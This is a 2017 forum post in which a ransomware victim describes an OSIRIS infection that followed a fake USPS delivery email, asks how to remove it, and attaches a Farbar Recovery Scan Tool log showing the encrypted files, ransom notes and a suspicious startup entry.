OSIRIS

Post by kmorod » January 24th, 2017, 12:42 am

My laptop has been attacked by OSIRIS; all of my files have been encrypted. How do I remove this OSIRIS? I have a backup of my files. I received an email showing the USPS could not deliver a package, please confirm the shipping label. When I tried to open the Word document nothing happened. Shortly thereafter I realized my files were no longer available.

This encryption attacked my Excel worksheet files, renamed my files to random names such as B25EF752--AD38--B401--80219FB4--9BBECE30BBA0, and changed the file type from Microsoft Office Excel Worksheet to OSIRIS File.

FRST Logs

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-01-2017
Ran by Karen Laptop (administrator) on KARENLAPTOP (22-01-2017 13:08:14)
Running from C:\Users\Karen Laptop\Downloads
Loaded Profiles: Karen Laptop (Available Profiles: Karen Laptop)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: "C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe" -- "%1")
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass 2011\TrueSuiteService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(APN LLC.) C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe
(HP) C:\Program Files (x86)\HP SimplePass 2011\TouchControl.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(HP) C:\Program Files (x86)\HP SimplePass 2011\BioMonitor.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar3.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.474\SSScheduler.exe
(APN) C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Hewlett-Packard Development Company L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPConnectionManager.exe
(Hewlett-Packard Development Company L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\hpCMSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Hewlett-Packard Development Company L.P.) C:\Program Files (x86)\Hewlett-Packard\Shared\hpCaslNotification.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
(The Chromium Authors) C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
(Farbar) C:\Users\Karen Laptop\Downloads\FRST64 (1).exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2799912 2011-06-09] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1424896 2011-09-08] (IDT, Inc.)
HKLM\...\Run: [SetDefault] => C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe [43320 2011-09-30] (Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1271168 2012-03-26] (Microsoft Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HPQuickWebProxy] => C:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe [169528 2011-10-07] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [574008 2011-07-11] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPConnectionManager] => C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPCMDelayStart.exe [103992 2011-09-13] (Hewlett-Packard Development Company L.P.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [ApnTBMon] => C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe [1928776 2016-11-08] (APN)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Run: [GoogleChromeAutoLaunch_A9391D59E0FAF74C91605C62F75F9E6D] => C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe [666624 2015-07-29] (The Chromium Authors)
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Run: [*basllntrba<*>] => "C:\Users\Karen Laptop\AppData\Local\910c7\e8bd5.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\MountPoints2: {6f2ce48b-c7d5-11e1-9d62-80c16e605e00} - G:\LaunchU3.exe -a
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\MountPoints2: {86d7c927-2971-11e5-99ee-80c16e605e00} - G:\VerizonSWUpgradeAssistantLauncher.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-01-01]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.474\SSScheduler.exe (McAfee, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 0.0.0.1 mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{68A8318F-B7B7-4746-BB17-76C936293DCA}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{B8823661-A8E9-43E7-AB76-5B67AC1EA16B}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{CE926AFF-C233-4529-8164-D0B29D9666FF}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID= ... B10E1F1D46
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID= ... B10E1F1D46
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID= ... B10E1F1D46
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT/1
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {2DD630AA-FBCE-4DFC-8A6E-8BBA8CC65125} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea ... -keywords={searchTerms}
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKLM -> {31090377-0740-419E-BEFC-A56E50500D5B} URL =
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Se ... ch?search={searchTerms}
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572 ... html?_nkw={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2DD630AA-FBCE-4DFC-8A6E-8BBA8CC65125} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea ... -keywords={searchTerms}
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Se ... ch?search={searchTerms}
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572 ... html?_nkw={searchTerms}
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> DefaultScope {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {2DD630AA-FBCE-4DFC-8A6E-8BBA8CC65125} URL =
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {31090377-0740-419E-BEFC-A56E50500D5B} URL = hxxp://search.babylon.com/?q={searchTerms}&affID=113959&tt=060612_6_&babsrc=SP_ss&mntrId=4458beac00000000000008edb9109b45
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Se ... ch?search={searchTerms}
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572 ... html?_nkw={searchTerms}
BHO: TrueSuite Website Log On -> {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} -> C:\Program Files (x86)\HP SimplePass 2011\x64\IEBHO.dll [2011-08-19] (HP)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO-x32: TrueSuite Website Log On -> {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} -> C:\Program Files (x86)\HP SimplePass 2011\IEBHO.dll [2011-08-19] (HP)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
Toolbar: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> No Name - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - No File
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} hxxps://join-test.webex.com/client/T27L ... atgpc1.cab

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-05-06] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll [2013-05-19] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\cgpcfg.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\CgpCore.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\confmgr.dll [2008-08-16] ()
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\ctxlogging.dll [2008-08-16] ()
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\ctxmui.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\icafile.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\icalogon.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\msvcm80.dll [2008-05-21] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\msvcp80.dll [2008-05-21] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\msvcr80.dll [2008-05-21] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\npicaN.dll [2008-08-16] ()
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\sslsdk_b.dll [2008-06-05] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\TcpPServ.dll [2008-08-16] (Citrix Systems, Inc.)

Chrome:
=======
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR DefaultSearchURL: Default -> hxxp://www.search.ask.com/web?q={searchTerms}
CHR DefaultSearchKeyword: Default -> search.ask.com
CHR DefaultSuggestURL: Default -> hxxp://ssmsp.ask.com/query?sstype=prefi ... =ff&q={searchTerms}
CHR Profile: C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default [2017-01-22]
CHR Extension: (Ask Search) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\aaaabibhgjnbdelbcijfciclijhdkgoh [2015-12-04]
CHR Extension: (Google Slides) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-28]
CHR Extension: (Google Docs) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-28]
CHR Extension: (Google Drive) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-28]
CHR Extension: (Website Logon) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfmogjcijkfeahcajecmmegieipfbdcc [2015-11-28]
CHR Extension: (YouTube) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-28]
CHR Extension: (OnlineMapFinder) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccjkfhdggacbjbbolmfgkfocaiccnnbd [2017-01-06]
CHR Extension: (Google Search) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-28]
CHR Extension: (Google Sheets) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-28]
CHR Extension: (Google Docs Offline) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-05-22]
CHR Extension: (Home Tab) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\kofkpgiaknijknhajbhnghkodiccblkg [2016-05-22]
CHR Extension: (FromDocToPDF) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-10-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
CHR Extension: (Gmail) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-28]
CHR Extension: (Chrome Media Router) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-21]
CHR HKLM\...\Chrome\Extension: [aaaabibhgjnbdelbcijfciclijhdkgoh] - C:\ProgramData\AskPartnerNetwork\Toolbar\Shared\CRX\aaaabibhgjnbdelbcijfciclijhdkgoh.crx [2016-11-09]
CHR HKLM\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3553682965-2478827086-665785291-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [aaaabibhgjnbdelbcijfciclijhdkgoh] - C:\ProgramData\AskPartnerNetwork\Toolbar\Shared\CRX\aaaabibhgjnbdelbcijfciclijhdkgoh.crx [2016-11-09]
CHR HKLM-x32\...\Chrome\Extension: [bfmogjcijkfeahcajecmmegieipfbdcc] - C:\Program Files (x86)\HP SimplePass 2011\tschrome.crx [2011-08-17]
CHR HKLM-x32\...\Chrome\Extension: [kincjchfokkeneeofpeefomkikfkiedl] - C:\Program Files (x86)\OApps\chromeaddon.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 APNMCP; C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe [201800 2016-11-08] (APN LLC.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.474\McCHSvc.exe [329480 2016-12-14] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [12600 2012-03-26] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [291696 2012-03-26] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497392 2016-05-06] (Symantec Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [203888 2012-03-20] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [98688 2012-03-20] (Microsoft Corporation)
U3 GrooveAuditService; no ImagePath
U3 GrooveInstallerService; no ImagePath
S1 ovobkwdb; \??\C:\Windows\system32\drivers\ovobkwdb.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-22 13:07 - 2017-01-22 13:07 - 02420736 _____ (Farbar) C:\Users\Karen Laptop\Downloads\FRST64 (1).exe
2017-01-22 13:04 - 2017-01-22 13:08 - 00023070 _____ C:\Users\Karen Laptop\Downloads\FRST.txt
2017-01-22 13:04 - 2017-01-22 13:05 - 00017576 _____ C:\Users\Karen Laptop\Downloads\Addition.txt
2017-01-22 13:03 - 2017-01-22 13:04 - 00000000 ____D C:\FRST
2017-01-22 13:03 - 2017-01-22 13:03 - 02420736 _____ (Farbar) C:\Users\Karen Laptop\Downloads\FRST64.exe
2017-01-22 13:02 - 2017-01-22 13:03 - 01762816 _____ (Farbar) C:\Users\Karen Laptop\Downloads\FRST.exe
2017-01-22 07:53 - 2017-01-22 07:53 - 00163652 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--80219FB4--9BBECE30BBA0.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00058692 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--9E950C1E--192F8B3A905A.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00047059 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--B060E460--C1AC71CF5152.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00034628 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--94F96ECD--7F70878AC416.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00026948 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--F1AC1582--EE92E9E668FA.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00015950 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--9D27223D--D189627EAC64.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00014292 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--B89F2E61--0B6490683E26.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00012486 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--22C0AAD2--FBCD5FCB8A18.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00011868 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--33C305DF--B31BB3D3BB33.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00011709 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--734137D2--1A6CFE3C6325.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Documents\OSIRIS-35c4.htm
2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Desktop\OSIRIS-2a43.htm
2017-01-22 07:52 - 2017-01-22 07:52 - 00000000 ____D C:\Users\Karen Laptop\AppData\Local\910c7
2017-01-01 12:51 - 2017-01-01 12:51 - 00001964 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2017-01-01 12:51 - 2017-01-01 12:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-22 12:58 - 2009-07-13 21:13 - 00784670 _____ C:\Windows\system32\PerfStringBackup.INI
2017-01-22 12:58 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\inf
2017-01-22 10:40 - 2012-06-20 17:59 - 00003966 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{7EDBB666-6155-498C-A9DE-64EE2BB2D2AC}
2017-01-22 07:56 - 2009-07-13 20:45 - 00032064 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
